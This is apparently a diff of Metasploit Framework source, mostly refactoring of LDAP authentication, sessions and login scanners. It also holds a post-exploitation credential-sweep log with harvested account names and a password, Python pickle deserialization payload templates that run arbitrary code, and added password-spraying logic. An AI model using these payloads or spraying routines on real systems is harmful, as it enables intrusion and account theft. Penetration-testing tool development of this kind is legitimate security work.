+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_544427.3
+[*] Processing C:\Users\test\AppData\Roaming\Sylpheed
+[*] Downloading C:\Users\test\AppData\Roaming\Sylpheed\accountrc.bak.4
+[*] Sylpheed Accountrc.bak.4 downloaded
+[+] File saved to:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_Sylpheedaccountr_309871.4
+
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] account_name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TestMcTestFace
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Test
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Wojtek
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] name=Testy
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=TheTestBed@testers.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] address=tmctestface50@gmail.com
+[*] Searches for credentials (USERNAMES/PASSWORDS)
+[+] password=tiaspbiqe2r
+[+] File with data saved:  /home/kali/.msf4/loot/20240508095411_default_10.0.0.2_EXTRACTIONaccoun_902434.4
+[*] PackRat credential sweep Completed
+[*] Post module execution completed
+
+
+```
@@ -59,7 +59,7 @@ meterpreter > background
 [*] Backgrounding session 2...
 ```

-Next, use the VSS module to the the storage information and then create a shadow copy of the `C:` drive (the default
+Next, use the VSS module to the storage information and then create a shadow copy of the `C:` drive (the default
 value).

 ```
@@ -0,0 +1,9 @@
+import pickle
+
+class GadgetChain:
+    def __reduce__(self):
+        return __builtins__.exec, ('#{escaped}',)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))
@@ -0,0 +1,14 @@
+import pickle
+import threading
+
+class CreateThread:
+    def __reduce__(self):
+        return threading.Thread, (None, __builtins__.exec, None, ('#{escaped}',))
+
+class GadgetChain:
+    def __reduce__(self):
+        return threading.Thread.start, (CreateThread(),)
+
+if __name__ == '__main__':
+    pickled = pickle.dumps(GadgetChain(), protocol=0)
+    print(repr(pickled.decode()))
@@ -82,11 +82,24 @@ module Metasploit::Framework
      self
    end

+    # Combines all the provided credential sources into a stream of {Credential}
+    # objects, yielding them one at a time
+    #
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
    def each_filtered
-      each_unfiltered do |credential|
-        next unless self.filter.nil? || self.filter.call(credential)
+      if password_spray
+        each_unfiltered_password_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)

-        yield credential
+          yield credential
+        end
+      else
+        each_unfiltered_username_first do |credential|
+          next unless self.filter.nil? || self.filter.call(credential)
+
+          yield credential
+        end
      end
    end

@@ -164,6 +177,7 @@ module Metasploit::Framework
  end

  class CredentialCollection < PrivateCredentialCollection
+    attr_accessor :password_spray

    # @!attribute additional_publics
    #   Additional public values that should be tried
@@ -219,12 +233,134 @@ module Metasploit::Framework
      additional_publics << public_str
    end

-    # Combines all the provided credential sources into a stream of {Credential}
-    # objects, yielding them one at a time
-    #
+    # When password spraying is enabled, do first passwords then usernames
+    #  i.e.
+    #   username1:password1
+    #   username2:password1
+    #   username3:password1
+    # ...
+    #   username1:password2
+    #   username2:password2
+    #   username3:password2
+    # ...
    # @yieldparam credential [Metasploit::Framework::Credential]
    # @return [void]
-    def each_unfiltered
+    def each_unfiltered_password_first
+      if user_file.present?
+        user_fd = File.open(user_file, 'r:binary')
+      end
+
+      prepended_creds.each { |c| yield c }
+
+      if anonymous_login
+        yield Metasploit::Framework::Credential.new(public: '', private: '', realm: realm, private_type: :password)
+      end
+
+      if password.present?
+        if nil_passwords
+          yield Metasploit::Framework::Credential.new(public: username, private: nil, realm: realm, private_type: :password)
+        end
+        if username.present?
+          yield Metasploit::Framework::Credential.new(public: username, private: password, realm: realm, private_type: private_type(password))
+        end
+        if user_as_pass
+          yield Metasploit::Framework::Credential.new(public: username, private: username, realm: realm, private_type: :password)
+        end
+        if blank_passwords
+          yield Metasploit::Framework::Credential.new(public: username, private: "", realm: realm, private_type: :password)
+        end
+        if user_fd
+          user_fd.each_line do |user_from_file|
+            user_from_file.chomp!
+            yield Metasploit::Framework::Credential.new(public: user_from_file, private: password, realm: realm, private_type: private_type(password))
+          end
+          user_fd.seek(0)
+        end
+      end
+
+      if pass_file.present?
+        File.open(pass_file, 'r:binary') do |pass_fd|
+          pass_fd.each_line do |pass_from_file|
+            pass_from_file.chomp!
+            if username.present?
+              yield Metasploit::Framework::Credential.new(public: username, private: pass_from_file, realm: realm, private_type: :password)
+            end
+            if user_as_pass
+              yield Metasploit::Framework::Credential.new(public: pass_from_file, private: pass_from_file, realm: realm, private_type: :password)
+            end
+            next unless user_fd
+
+            user_fd.each_line do |user_from_file|
+              user_from_file.chomp!
+              yield Metasploit::Framework::Credential.new(public: user_from_file, private: pass_from_file, realm: realm, private_type: private_type(pass_from_file))
+            end
+            user_fd.seek(0)
+          end
+        end
+      end
+
+      if userpass_file.present?
+        File.open(userpass_file, 'r:binary') do |userpass_fd|
+          userpass_fd.each_line do |line|
+            user, pass = line.split(" ", 2)
+            if pass.blank?
+              pass = ''
+            else
+              pass.chomp!
+            end
+            yield Metasploit::Framework::Credential.new(public: user, private: pass, realm: realm)
+          end
+        end
+      end
+
+      additional_privates.each do |add_private|
+        if username.present?
+          yield Metasploit::Framework::Credential.new(public: username, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.each_line do |user_from_file|
+          user_from_file.chomp!
+          yield Metasploit::Framework::Credential.new(public: user_from_file, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+        user_fd.seek(0)
+      end
+
+      additional_publics.each do |add_public|
+        if password.present?
+          yield Metasploit::Framework::Credential.new(public: add_public, private: password, realm: realm, private_type: private_type(password) )
+        end
+        if user_as_pass
+          yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: :password)
+        end
+        if blank_passwords
+          yield Metasploit::Framework::Credential.new(public: add_public, private: "", realm: realm, private_type: :password)
+        end
+        if user_fd
+          user_fd.each_line do |user_from_file|
+            user_from_file.chomp!
+            yield Metasploit::Framework::Credential.new(public: add_public, private: user_from_file, realm: realm, private_type: private_type(user_from_file))
+          end
+          user_fd.seek(0)
+        end
+        additional_privates.each do |add_private|
+          yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
+        end
+      end
+    ensure
+      user_fd.close if user_fd && !user_fd.closed?
+    end
+
+    # When password spraying is not enabled, do first usernames then passwords
+    #  i.e.
+    #   username1:password1
+    #   username1:password2
+    #   username1:password3
+    # ...
+    #   username2:password1
+    #   username2:password2
+    #   username2:password3
+    # @yieldparam credential [Metasploit::Framework::Credential]
+    # @return [void]
+    def each_unfiltered_username_first
      if pass_file.present?
        pass_fd = File.open(pass_file, 'r:binary')
      end
@@ -325,7 +461,6 @@ module Metasploit::Framework
          yield Metasploit::Framework::Credential.new(public: add_public, private: add_private, realm: realm, private_type: private_type(add_private))
        end
      end
-
    ensure
      pass_fd.close if pass_fd && !pass_fd.closed?
    end
@@ -1,5 +1,7 @@
 # frozen_string_literal: true

+require 'rex/proto/ldap/auth_adapter'
+
 module Metasploit
  module Framework
    module LDAP
@@ -24,18 +26,16 @@ module Metasploit

          case opts[:ldap_auth]
          when Msf::Exploit::Remote::AuthOption::SCHANNEL
-            raise Msf::ValidationError, 'The SSL option must be enabled when using SCHANNEL authentication.' unless ssl
-
-            connect_opts.merge!(ldap_auth_opts_scahnnel(opts))
+            connect_opts.merge!(ldap_auth_opts_schannel(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::KERBEROS
-            connect_opts.merge!(ldap_auth_opts_kerberos(opts))
+            connect_opts.merge!(ldap_auth_opts_kerberos(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::NTLM
-            connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+            connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
          when Msf::Exploit::Remote::AuthOption::PLAINTEXT
            connect_opts.merge!(ldap_auth_opts_plaintext(opts))
          when Msf::Exploit::Remote::AuthOption::AUTO
            if opts[:username].present? && opts[:domain].present?
-              connect_opts.merge!(ldap_auth_opts_ntlm(opts))
+              connect_opts.merge!(ldap_auth_opts_ntlm(opts, ssl))
            elsif opts[:username].present?
              connect_opts.merge!(ldap_auth_opts_plaintext(opts))
            end
@@ -46,14 +46,15 @@ module Metasploit

        private

-        def ldap_auth_opts_kerberos(opts)
+        def ldap_auth_opts_kerberos(opts, ssl)
          auth_opts = {}
-          raise Msf::ValidationError, 'The Ldap::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
+          raise Msf::ValidationError, 'The LDAP::Rhostname option is required when using Kerberos authentication.' if opts[:ldap_rhostname].blank?
          raise Msf::ValidationError, 'The DOMAIN option is required when using Kerberos authentication.' if opts[:domain].blank?

          offered_etypes = Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(opts[:ldap_krb_offered_enc_types])
          raise Msf::ValidationError, 'At least one encryption type is required when using Kerberos authentication.' if offered_etypes.empty?

+          sign_and_seal = opts.fetch(:sign_and_seal, !ssl)
          kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::LDAP.new(
            host: opts[:domain_controller_rhost].blank? ? nil : opts[:domain_controller_rhost],
            hostname: opts[:ldap_rhostname],
@@ -64,58 +65,41 @@ module Metasploit
            framework_module: opts[:framework_module],
            cache_file: opts[:ldap_krb5_cname].blank? ? nil : opts[:ldap_krb5_cname],
            ticket_storage: opts[:kerberos_ticket_storage],
-            offered_etypes: offered_etypes
+            offered_etypes: offered_etypes,
+            mutual_auth: true,
+            use_gss_checksum: sign_and_seal || ssl
          )

          auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: proc do
-              kerberos_result = kerberos_authenticator.authenticate
-              kerberos_result[:security_blob]
-            end,
-            challenge_response: true
+            method: :rex_kerberos,
+            kerberos_authenticator: kerberos_authenticator,
+            sign_and_seal: sign_and_seal
          }
+
          auth_opts
        end

-        def ldap_auth_opts_ntlm(opts)
+        def ldap_auth_opts_ntlm(opts, ssl)
          auth_opts = {}
-          ntlm_client = RubySMB::NTLM::Client.new(
-            opts[:username],
-            opts[:password],
-            workstation: 'WORKSTATION',
-            domain: opts[:domain].blank? ? '.' : opts[:domain],
-            flags:
-              RubySMB::NTLM::NEGOTIATE_FLAGS[:UNICODE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:REQUEST_TARGET] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:NTLM] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:ALWAYS_SIGN] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:EXTENDED_SECURITY] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:KEY_EXCHANGE] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:TARGET_INFO] |
-                RubySMB::NTLM::NEGOTIATE_FLAGS[:VERSION_INFO]
-          )
-
-          negotiate = proc do |challenge|
-            ntlmssp_offset = challenge.index('NTLMSSP')
-            type2_blob = challenge.slice(ntlmssp_offset..-1)
-            challenge = [type2_blob].pack('m')
-            type3_message = ntlm_client.init_context(challenge)
-            type3_message.serialize
-          end

          auth_opts[:auth] = {
-            method: :sasl,
-            mechanism: 'GSS-SPNEGO',
-            initial_credential: ntlm_client.init_context.serialize,
-            challenge_response: negotiate
+            # use the rex one provided by us to support TLS channel binding (see: ruby-ldap/ruby-net-ldap#407) and blank
+            # passwords (see: WinRb/rubyntlm#45)
+            method: :rex_ntlm,
+            username: opts[:username],
+            password: opts[:password],
+            domain: opts[:domain],
+            workstation: 'WORKSTATION',
+            sign_and_seal: opts.fetch(:sign_and_seal, !ssl)
          }
+
          auth_opts
        end

        def ldap_auth_opts_plaintext(opts)
          auth_opts = {}
+          raise Msf::ValidationError, 'Can not sign and seal when using Plaintext authentication.' if opts.fetch(:sign_and_seal, false)
+
          auth_opts[:auth] = {
            method: :simple,
            username: opts[:username],
@@ -124,10 +108,12 @@ module Metasploit
          auth_opts
        end

-        def ldap_auth_opts_scahnnel(opts)
+        def ldap_auth_opts_schannel(opts, ssl)
          auth_opts = {}
          pfx_path = opts[:ldap_cert_file]
-          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using SCHANNEL authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'The SSL option must be enabled when using Schannel authentication.' unless ssl
+          raise Msf::ValidationError, 'The LDAP::CertFile option is required when using Schannel authentication.' if pfx_path.blank?
+          raise Msf::ValidationError, 'Can not sign and seal when using Schannel authentication.' if opts.fetch(:sign_and_seal, false)

          unless ::File.file?(pfx_path) && ::File.readable?(pfx_path)
            raise Msf::ValidationError, 'Failed to load the PFX certificate file. The path was not a readable file.'
@@ -11,8 +11,10 @@ module Metasploit
        include Metasploit::Framework::LDAP::Client
        include Msf::Exploit::Remote::LDAP

-        attr_accessor :opts
-        attr_accessor :realm_key
+        attr_accessor :opts, :realm_key
+        # @!attribute use_client_as_proof
+        #   @return [Boolean] If a login is successful and this attribute is true - an LDAP::Client instance is used as proof
+        attr_accessor :use_client_as_proof

        def attempt_login(credential)
          result_opts = {
@@ -36,17 +38,24 @@ module Metasploit
          }.merge(@opts)

          connect_opts = ldap_connect_opts(host, port, connection_timeout, ssl: opts[:ssl], opts: opts)
-          ldap_open(connect_opts) do |ldap|
-            return status_code(ldap.get_operation_result.table)
+          begin
+            ldap_client = ldap_open(connect_opts, keep_open: true)
+            return status_code(ldap_client)
          rescue StandardError => e
            { status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e }
          end
        end

-        def status_code(operation_result)
-          case operation_result[:code]
+        def status_code(ldap_client)
+          operation_result = ldap_client.get_operation_result.table[:code]
+          case operation_result
          when 0
-            { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            result = { status: Metasploit::Model::Login::Status::SUCCESSFUL }
+            if use_client_as_proof
+              result[:proof] = ldap_client
+              result[:connection] = ldap_client.socket
+            end
+            result
          else
            { status: Metasploit::Model::Login::Status::INCORRECT, proof: "Bind Result: #{operation_result}" }
          end
@@ -84,7 +93,6 @@ module Metasploit
              credential.public = "#{credential.public}@#{opts[:domain]}"
              yield credential
            end
-
          end
        end
      end
@@ -34,17 +34,13 @@ module Metasploit
          false
        end

-        # the actual login method, called by #attempt_login
+        # get the authentication token
        #
-        # @param user [String] The username to try
-        # @param pass [String] The password to try
+        # @param user [String] The username
        # @return [Hash]
        #   * status [Metasploit::Model::Login::Status]
-        #   * proof [String] the HTTP response body
-        def do_login(user, pass)
-          # prep the data needed for login
-          protocol = ssl ? 'https' : 'http'
-          # attempt to get an authentication token
+        #   * proof [String] the authentication token 
+        def get_auth_token(user)
          auth_token_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication-token")

          # send the request to get an authentication token
@@ -79,9 +75,43 @@ module Metasploit
            return { status: LOGIN_STATUS::INCORRECT, proof: auth_res.body.to_s }
          end

+          { status: LOGIN_STATUS::SUCCESSFUL, proof: auth_token }
+        end
+
+        # generate a signature from the authentication token, username, and password
+        #
+        # @param auth_token [String] The authentication token retrieved by calling get_auth_token
+        # @param user [String] The username
+        # @param pass [String] The password
+        # @return [String] A hexadecimal string representation of the signature
+        def generate_signature(auth_token, user, pass)
+          Digest::MD5.hexdigest(auth_token + pass + auth_token + user + auth_token)
+        end
+
+        # the actual login method, called by #attempt_login
+        #
+        # @param user [String] The username to try
+        # @param pass [String] The password to try
+        # @return [Hash]
+        #   * status [Metasploit::Model::Login::Status]
+        #   * proof [String] the HTTP response body
+        def do_login(user, pass)
+          # prep the data needed for login
+          protocol = ssl ? 'https' : 'http'
+          # attempt to get an authentication token
+          auth_token_res = get_auth_token(user)
+          # get_auth_token always returns a hash - check that status is SUCCESSFUL
+          # if not, just return as it is
+          unless auth_token_res[:status] == LOGIN_STATUS::SUCCESSFUL
+            return auth_token_res
+          end
+
+          # extract the authentication token from the hash
+          auth_token = auth_token_res[:proof]
+          
          login_uri = normalize_uri("#{uri}/runtime/core/user/#{user}/authentication")
          # calculate signature to use when logging in
-          signature = Digest::MD5.hexdigest(auth_token + pass + auth_token + user + auth_token)
+          signature = generate_signature(auth_token, user, pass)
          # GET parameters for login
          vars_get = {
            'Signature' => signature,
@@ -32,7 +32,7 @@ module Metasploit
        end
      end

-      VERSION = "6.4.3"
+      VERSION = "6.4.12"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -221,6 +221,13 @@ class Config < Hash
    self.new.smb_session_history
  end

+  # Returns the full path to the ldap session history file.
+  #
+  # @return [String] path to the history file.
+  def self.ldap_session_history
+    self.new.ldap_session_history
+  end
+
  # Returns the full path to the PostgreSQL session history file.
  #
  # @return [String] path to the history file.
@@ -228,13 +235,6 @@ class Config < Hash
    self.new.postgresql_session_history
  end

-  # Returns the full path to the PostgreSQL interactive query history file
-  #
-  # @return [String] path to the interactive query history file.
-  def self.postgresql_session_history_interactive
-    self.new.postgresql_session_history_interactive
-  end
-
  # Returns the full path to the MSSQL session history file.
  #
  # @return [String] path to the history file.
@@ -242,13 +242,6 @@ class Config < Hash
    self.new.mssql_session_history
  end

-  # Returns the full path to the MSSQL interactive query history file
-  #
-  # @return [String] path to the interactive query history file.
-  def self.mssql_session_history_interactive
-    self.new.mssql_session_history_interactive
-  end
-
  # Returns the full path to the MySQL session history file.
  #
  # @return [String] path to the history file.
@@ -256,13 +249,6 @@ class Config < Hash
    self.new.mysql_session_history
  end

-  # Returns the full path to the MySQL interactive query history file
-  #
-  # @return [String] path to the interactive query history file.
-  def self.mysql_session_history_interactive
-    self.new.mysql_session_history_interactive
-  end
-
  def self.pry_history
    self.new.pry_history
  end
@@ -372,30 +358,22 @@ class Config < Hash
    config_directory + FileSep + "smb_session_history"
  end

-  def postgresql_session_history
-    config_directory + FileSep + "postgresql_session_history"
+  def ldap_session_history
+    config_directory + FileSep + "ldap_session_history"
  end

-  def postgresql_session_history_interactive
-    postgresql_session_history + "_interactive"
+  def postgresql_session_history
+    config_directory + FileSep + "postgresql_session_history"
  end

  def mysql_session_history
    config_directory + FileSep + "mysql_session_history"
  end

-  def mysql_session_history_interactive
-    mysql_session_history + "_interactive"
-  end
-
  def mssql_session_history
    config_directory + FileSep + "mssql_session_history"
  end

-  def mssql_session_history_interactive
-    mssql_session_history + "_interactive"
-  end
-
  def pry_history
    config_directory + FileSep + "pry_history"
  end
@@ -569,15 +569,15 @@ class ReadableText
  # @param missing [Boolean] dump only empty required options.
  # @return [String] the string form of the information.
  def self.dump_options(mod, indent = '', missing = false, advanced: false, evasion: false)
-    filtered_options = mod.options.values.select { |opt| opt.advanced? == advanced && opt.evasion? == evasion }
+    filtered_options = mod.options.select { |_name, opt| opt.advanced? == advanced && opt.evasion? == evasion }

-    option_groups = mod.options.groups.map { |_name, group| group }.sort_by(&:name)
+    option_groups = mod.options.groups.values.select { |group| group.option_names.any? { |name| filtered_options.keys.include?(name) } }
    options_by_group = option_groups.map do |group|
-      [group, group.option_names.map { |name| mod.options[name] }.compact]
+      [group, group.option_names.map { |name| filtered_options[name] }.compact]
    end.to_h
    grouped_option_names = option_groups.flat_map(&:option_names)
-    remaining_options = filtered_options.reject { |option| grouped_option_names.include?(option.name) }
-    options_grouped_by_conditions = remaining_options.group_by(&:conditions)
+    remaining_options = filtered_options.reject { |_name, option| grouped_option_names.include?(option.name) }
+    options_grouped_by_conditions = remaining_options.values.group_by(&:conditions)

    option_tables = []

@@ -1061,7 +1061,7 @@ class ReadableText
        persist_list.each do |e|
          handler_ctx = framework.jobs[job_id.to_s].ctx[1]
          if handler_ctx && handler_ctx.respond_to?(:datastore)
-             row[7] = 'true' if e['mod_options']['Options'] == handler_ctx.datastore
+             row[7] = 'true' if e['mod_options']['Options'] == handler_ctx.datastore.to_h
          end
        end

@@ -0,0 +1,142 @@
+# -*- coding: binary -*-
+
+require 'rex/post/ldap'
+
+class Msf::Sessions::LDAP
+  #
+  # This interface supports basic interaction.
+  #
+  include Msf::Session::Basic
+  include Msf::Sessions::Scriptable
+
+  # @return [Rex::Post::LDAP::Ui::Console] The interactive console
+  attr_accessor :console
+  # @return [Rex::Proto::LDAP::Client] The LDAP client
+  attr_accessor :client
+
+  attr_accessor :platform, :arch
+  attr_reader :framework
+
+  # @param[Rex::IO::Stream] rstream
+  # @param [Hash] opts
+  # @option opts [Rex::Proto::LDAP::Client] :client
+  def initialize(rstream, opts = {})
+    @client = opts.fetch(:client)
+    self.console = Rex::Post::LDAP::Ui::Console.new(self)
+    super(rstream, opts)
+  end
+
+  def bootstrap(datastore = {}, handler = nil)
+    session = self
+    session.init_ui(user_input, user_output)
+
+    @info = "LDAP #{datastore['USERNAME']} @ #{@peer_info}"
+  end
+
+  def execute_file(full_path, args)
+    if File.extname(full_path) == '.rb'
+      Rex::Script::Shell.new(self, full_path).run(args)
+    else
+      console.load_resource(full_path)
+    end
+  end
+
+  def process_autoruns(datastore)
+    ['InitialAutoRunScript', 'AutoRunScript'].each do |key|
+      next if datastore[key].nil? || datastore[key].empty?
+
+      args = Shellwords.shellwords(datastore[key])
+      print_status("Session ID #{sid} (#{tunnel_to_s}) processing #{key} '#{datastore[key]}'")
+      execute_script(args.shift, *args)
+    end
+  end
+
+  def type
+    self.class.type
+  end
+
+  # Returns the type of session.
+  #
+  def self.type
+    'ldap'
+  end
+
+  def self.can_cleanup_files
+    false
+  end
+
+  #
+  # Returns the session description.
+  #
+  def desc
+    'LDAP'
+  end
+
+  def address
+    @address ||= client.peerhost
+  end
+
+  def port
+    @port ||= client.peerport
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Initializes the console's I/O handles.
+  #
+  def init_ui(input, output)
+    self.user_input = input
+    self.user_output = output
+    console.init_ui(input, output)
+    console.set_log_source(log_source)
+
+    super
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Resets the console's I/O handles.
+  #
+  def reset_ui
+    console.unset_log_source
+    console.reset_ui
+  end
+
+  def exit
+    console.stop
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  # Override the basic session interaction to use shell_read and
+  # shell_write instead of operating on rstream directly.
+  def _interact
+    framework.events.on_session_interact(self)
+    framework.history_manager.with_context(name: type.to_sym) do
+      _interact_stream
+    end
+  end
+
+  ##
+  # :category: Msf::Session::Interactive implementors
+  #
+  def _interact_stream
+    framework.events.on_session_interact(self)
+
+    console.framework = framework
+    # Call the console interaction of the ldap client and
+    # pass it a block that returns whether or not we should still be
+    # interacting.  This will allow the shell to abort if interaction is
+    # canceled.
+    console.interact { interacting != true }
+    console.framework = nil
+
+    # If the stop flag has been set, then that means the user exited.  Raise
+    # the EOFError so we can drop this handle like a bad habit.
+    raise EOFError if (console.stopped? == true)
+  end
+
+end
@@ -8,6 +8,8 @@ class Msf::Sessions::MSSQL < Msf::Sessions::Sql

  def initialize(rstream, opts = {})
    @client = opts.fetch(:client)
+    self.platform = opts.fetch(:platform)
+    self.arch = opts.fetch(:arch)
    self.console = ::Rex::Post::MSSQL::Ui::Console.new(self, opts)

    super(rstream, opts)
@@ -9,6 +9,8 @@ class Msf::Sessions::PostgreSQL < Msf::Sessions::Sql
  # @param opts [Msf::Db::PostgresPR::Connection] :client
  def initialize(rstream, opts = {})
    @client = opts.fetch(:client)
+    self.platform = opts.fetch(:platform)
+    self.arch = opts.fetch(:arch)
    @console = ::Rex::Post::PostgreSQL::Ui::Console.new(self)
    super(rstream, opts)
  end
@@ -18,10 +18,14 @@ module Module
  def _import_extra_options(opts)
    # If options were supplied, import them into the payload's
    # datastore
-    if (opts['Options'])
-      self.datastore.import_options_from_hash(opts['Options'])
-    elsif (opts['OptionStr'])
-      self.datastore.import_options_from_s(opts['OptionStr'])
+    if (value = opts['Options'])
+      if value.is_a?(String)
+        self.datastore.import_options_from_s(value)
+      else
+        self.datastore.import_options_from_hash(value)
+      end
+    elsif (value = opts['OptionStr'])
+      self.datastore.import_options_from_s(value)
    end
  end

@@ -9,6 +9,8 @@ module Msf

 module Auxiliary::AuthBrute

+  include Msf::Auxiliary::LoginScanner
+
  def initialize(info = {})
    super

@@ -61,6 +63,7 @@ module Auxiliary::AuthBrute
      user_file: datastore['USER_FILE'],
      userpass_file: datastore['USERPASS_FILE'],
      user_as_pass: datastore['USER_AS_PASS'],
+      password_spray: datastore['PASSWORD_SPRAY']
    }.merge(opts))

    if framework.db.active
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Auxiliary
+    ###
+    #
+    # This module provides a base configure scanner method for binding common datastore options to the login scanners
+    #
+    ###
+    module LoginScanner
+      #
+      # Converts datastore options into configuration parameters for the
+      # Msf::Auxiliary::LoginScanner. Any parameters passed into
+      # this method will override the defaults.
+      #
+      def configure_login_scanner(conf)
+        {
+          host: datastore['RHOST'],
+          port: datastore['RPORT'],
+          proxies: datastore['Proxies'],
+          stop_on_success: datastore['STOP_ON_SUCCESS'],
+          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
+          framework: framework,
+          framework_module: self,
+          local_port: datastore['CPORT'],
+          local_host: datastore['CHOST'],
+        }.merge(conf)
+      end
+    end
+  end
+end
@@ -25,10 +25,14 @@ module Msf
      begin
        connect
        sock.send(header + data_length + data, 0)
-        res = sock.recv(1024)
+        res_length = sock.timed_read(4)&.unpack1('N')
+        return nil if res_length.nil?
+
+        res = sock.timed_read(res_length)
      rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
        print_error("Unable to connect: #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-        elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+        elog('Error sending the rocketmq version request', error: e)
+        return nil
      ensure
        disconnect
      end
@@ -64,7 +68,11 @@ module Msf
    # @return [Hash] Hash including RocketMQ versions info and Broker info if found
    def parse_rocketmq_data(res)
      # remove a response header so we have json-ish data
-      res = res[8..]
+      res = res.split(/\x00_/)[1]
+      unless res.starts_with?("{")
+        print_error("Failed to successfully remove the response header and now cannot parse the response.")
+        return nil
+      end

      # we have 2 json objects appended to each other, so we now need to split that out and make it usable
      res = res.split('}{')
@@ -111,14 +119,21 @@ module Msf
      # Example of brokerData:
      # [{"brokerAddrs"=>{"0"=>"172.16.199.135:10911"}, "brokerName"=>"DESKTOP-8ATHH6O", "cluster"=>"DefaultCluster"}]

+      if broker_datas['brokerDatas'].blank?
+        print_status("brokerDatas field is missing from the response, assuming default broker port of #{default_broker_port}")
+        return default_broker_port
+      end
      broker_datas['brokerDatas'].each do |broker_data|
+        if broker_data['brokerAddrs'].blank?
+          print_status("brokerAddrs field is missing from the response, assuming default broker port of #{default_broker_port}")
+          return default_broker_port
+        end
        broker_data['brokerAddrs'].values.each do |broker_endpoint|
          next unless broker_endpoint.start_with?("#{rhost}:")
          return broker_endpoint.match(/\A#{rhost}:(\d+)\z/)[1].to_i
        end
      end

-
      print_status("autodetection failed, assuming default port of #{default_broker_port}")
      default_broker_port
    end
@@ -99,6 +99,8 @@ FIRST_ATTEMPT_FAIL = 'first-attempt-fail'
 REPEATABLE_SESSION = 'repeatable-session'
 # The module isn't expected to get a shell reliably (such as only once).
 UNRELIABLE_SESSION = 'unreliable-session'
+# The module may not execute the payload until an external event occurs. For instance, a cron job, machine restart, user interaction within a GUI element, etc.
+EVENT_DEPENDENT = 'event-dependent'

 module HttpClients
  IE = "MSIE"
@@ -211,7 +211,7 @@ module Msf::DBManager::Cred

    # Update the timestamp
    if cred.changed?
-      msf_import_timestamps(opts,cred)
+      msf_assign_timestamps(opts, cred)
      cred.save!
    end

@@ -274,7 +274,7 @@ module Msf::DBManager::Host
      host_state_changed(host, ostate) if host.state != ostate

      if host.changed?
-        msf_import_timestamps(opts, host)
+        msf_assign_timestamps(opts, host)
        host.save!
      end
